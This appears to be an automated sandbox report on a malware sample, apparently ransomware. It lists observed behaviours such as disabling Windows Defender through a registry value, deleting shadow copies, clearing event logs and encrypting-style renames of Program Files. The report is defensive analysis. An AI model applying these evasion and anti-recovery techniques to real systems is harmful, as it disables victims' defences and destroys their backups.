Analysis Overview
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
Threat Level: Known bad
The file cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68 was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Deletes Windows Defender Definitions
Modifies security service
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
Launches sc.exe
Interacts with shadow copies
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-01-13 11:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-01-13 11:04
Reported
2022-01-13 11:09
Platform
win7-en-20211208
Max time kernel
48s
Max time network
14s
Command Line
Signatures
Deletes Windows Defender Definitions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Windows Defender\MpCmdRun.exe | N/A |
Modifies Windows Defender Real-time Protection settings
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" | C:\Windows\SysWOW64\reg.exe | N/A |
Clears Windows event logs
Deletes shadow copies
Reads user/profile data of web browsers
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Common Files\System\ado\msado28.tlb | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.annotation_1.2.0.v201401042248.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sK9Z6uVqgCA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\1.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD19988_.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ktQG2gupiNg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wzbAmmSTcUc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\tipresx.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_MhONk5VDv180.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\MANIFEST.MF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_HYlCkFtTUwI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_m.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Stacking\NavigationLeft_SelectionSubpicture.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_5CMJabjKdpM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_irmsRX9qs740.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\Ole DB\ja-JP\sqloledb.rll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_q81bQfQ2f1Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\System\msadc\en-US\msadcfr.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187863.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NoEGqOHMJWk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\7z.sfx.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_cwXQgAQAQfI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Scene_loop_PAL.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainBackground.wmv | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Sao_Paulo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_BlfwRvA2pzs0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-api-caching_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_VipML3zsbvg0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_kpWy3fnCXck0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_eLG0CqoMiTA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_hN6tnWzTRKA0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_ywVQAU2fjic0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dial_lrg_sml.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_4oAyxzhVM1g0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.jarprocessor_1.0.300.v20131211-1531.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_n4jsJOo2n8k0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NugW263pHY40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0318804.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LntGZXJ11zc0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-dialogs.xml.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Bwbzt3M7wMw0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\Asia\Choibalsan.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_WUEr4Y1hm8Y0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\7-Zip\Lang\pa-in.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_fE2zslmI26w0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Common Files\Microsoft Shared\ink\es-ES\TipTsf.dll.mui | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uf0jDBkID040.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\buttonUp_Off.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341534.JPG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_6_Z3hoH2DiM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Novokuznetsk.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_LeKKP-R4cPM0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\CST6.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_sMANohA3BTY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_z3Qsr1ZexBk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_urNWfzniZow0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\lua\http\dialogs\error_window.html.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_rfnb0gdSkok0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_snow.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\PIXEL\THMBNAIL.PNG.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_bOvj6YDEwaI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_vBYlIJuWoGY0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Ksfl8zQYAyQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.nl_zh_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_yC8Io2umc9c0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_qnbAWbrVUAU0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_uniYPXU4nnQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre7\lib\zi\America\Phoenix.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_NEKuOA9cTA40.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0195254.WMF.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_xcOR5JuLIaI0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\TitleButtonIcon.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_Tn8rNgR3ZQk0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\images\ehshellLogo.png | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_wqyP41r4tuQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\MSTAG.TLB.8l_4sG31BFP27mssYB1ht0we8z4x78bMXAIIPjwieUn_tU27Jl307qQ0.fmu9d | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Launches sc.exe
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\vssadmin.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
